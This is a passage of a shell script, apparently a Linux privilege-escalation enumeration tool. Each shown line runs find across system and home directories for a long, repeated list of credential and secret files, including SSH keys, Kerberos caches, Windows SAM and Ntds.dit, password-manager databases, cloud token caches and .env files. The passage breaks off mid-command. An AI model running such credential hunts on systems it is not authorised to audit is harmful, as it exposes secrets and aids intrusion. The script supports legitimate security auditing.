\"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 768 FIND_CACHE=`eval_bckgrd "find ${ROOT_FOLDER}.cache -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 769 FIND_CDROM=`eval_bckgrd "find ${ROOT_FOLDER}cdrom -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 770 FIND_ETC=`eval_bckgrd "find ${ROOT_FOLDER}etc -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"*knockd*\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"sitemanager.xml\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"exports\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 771 FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name 